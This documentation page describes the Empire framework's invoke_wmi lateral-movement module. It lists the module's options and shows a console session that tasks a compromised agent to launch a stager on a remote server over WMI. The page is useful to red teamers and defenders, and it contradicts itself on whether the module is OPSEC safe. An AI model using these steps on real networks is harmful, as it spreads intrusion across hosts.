Invoke-WMI - Empire Module


This page contains detailed information about how to use the powershell/lateral_movement/invoke_wmi Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview


Name: Invoke-WMI
Module: powershell/lateral_movement/invoke_wmi
Source code [1]: empire/server/modules/powershell/lateral_movement/invoke_wmi.yaml
Source code [2]: empire/server/modules/powershell/lateral_movement/invoke_wmi.py
MITRE ATT&CK: T1047
Language: PowerShell
Needs admin: No
OPSEC safe: Yes
Background: No

The invoke_wmi module executes a stager on remote hosts using WMI.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the invoke_wmi module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options


This is a list of options that are required by the invoke_wmi module:

Agent
Agent to run module on.

ComputerName
Host[s] to execute the stager on, comma separated.

Additional Module Options


This is a list of additional options that are supported by the invoke_wmi module:

Bypasses
Bypasses as a space separated list to be prepended to the launcher.
Default value: False.

Command
Custom command to run.

CredID
CredID from the store to use.

Listener
Listener to use.

Obfuscate
Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.
Default value: False.

ObfuscateCommand
The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.
Default value: Token\All\1.

Password
Password to use to execute command.

Proxy
Proxy to use for request (default, none, or other).
Default value: default.

ProxyCreds
Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
Default value: default.

UserAgent
User-agent string to use for the staging request (default, none, or other).
Default value: default.

UserName
[domain\]username to use to execute command.

Invoke_wmi Example Usage


Here's an example of how to use the invoke_wmi module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/lateral_movement/invoke_wmi

 Author       @harmj0y                                     
 Background   False                                        
 Description  Executes a stager on remote hosts using WMI. 
 Language     powershell                                   
 Name         powershell/lateral_movement/invoke_wmi       
 NeedsAdmin   False                                        
 OpsecSafe    True                                         
 Techniques   http://attack.mitre.org/techniques/T1047     


,Record Options----,-------------,----------,-------------------------------------,
| Name             | Value       | Required | Description                         |
|------------------|-------------|----------|-------------------------------------|
| Agent            |             | True     | Agent to run module on.             |
|------------------|-------------|----------|-------------------------------------|
| Bypasses         | False       | False    | Bypasses as a space separated list  |
|                  |             |          | to be prepended to the launcher.    |
|------------------|-------------|----------|-------------------------------------|
| Command          |             | False    | Custom command to run.              |
|------------------|-------------|----------|-------------------------------------|
| ComputerName     |             | True     | Host[s] to execute the stager on,   |
|                  |             |          | comma separated.                    |
|------------------|-------------|----------|-------------------------------------|
| CredID           |             | False    | CredID from the store to use.       |
|------------------|-------------|----------|-------------------------------------|
| Listener         |             | False    | Listener to use.                    |
|------------------|-------------|----------|-------------------------------------|
| Obfuscate        | False       | False    | Switch. Obfuscate the launcher      |
|                  |             |          | powershell code, uses the           |
|                  |             |          | ObfuscateCommand for obfuscation    |
|                  |             |          | types. For powershell only.         |
|------------------|-------------|----------|-------------------------------------|
| ObfuscateCommand | Token\All\1 | False    | The Invoke-Obfuscation command to   |
|                  |             |          | use. Only used if Obfuscate switch  |
|                  |             |          | is True. For powershell only.       |
|------------------|-------------|----------|-------------------------------------|
| Password         |             | False    | Password to use to execute command. |
|------------------|-------------|----------|-------------------------------------|
| Proxy            | default     | False    | Proxy to use for request (default,  |
|                  |             |          | none, or other).                    |
|------------------|-------------|----------|-------------------------------------|
| ProxyCreds       | default     | False    | Proxy credentials                   |
|                  |             |          | ([domain\]username:password) to use |
|                  |             |          | for request (default, none, or      |
|                  |             |          | other).                             |
|------------------|-------------|----------|-------------------------------------|
| UserAgent        | default     | False    | User-agent string to use for the    |
|                  |             |          | staging request (default, none, or  |
|                  |             |          | other).                             |
|------------------|-------------|----------|-------------------------------------|
| UserName         |             | False    | [domain\]username to use to execute |
|                  |             |          | command.                            |
'------------------'-------------'----------'-------------------------------------'

(Empire: usemodule/powershell/lateral_movement/invoke_wmi) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/lateral_movement/invoke_wmi) > set ComputerName dbserver-01
[*] Set ComputerName to dbserver-01
(Empire: usemodule/powershell/lateral_movement/invoke_wmi) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Author


References


See Also


Check also the following modules related to this module:

Version


This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.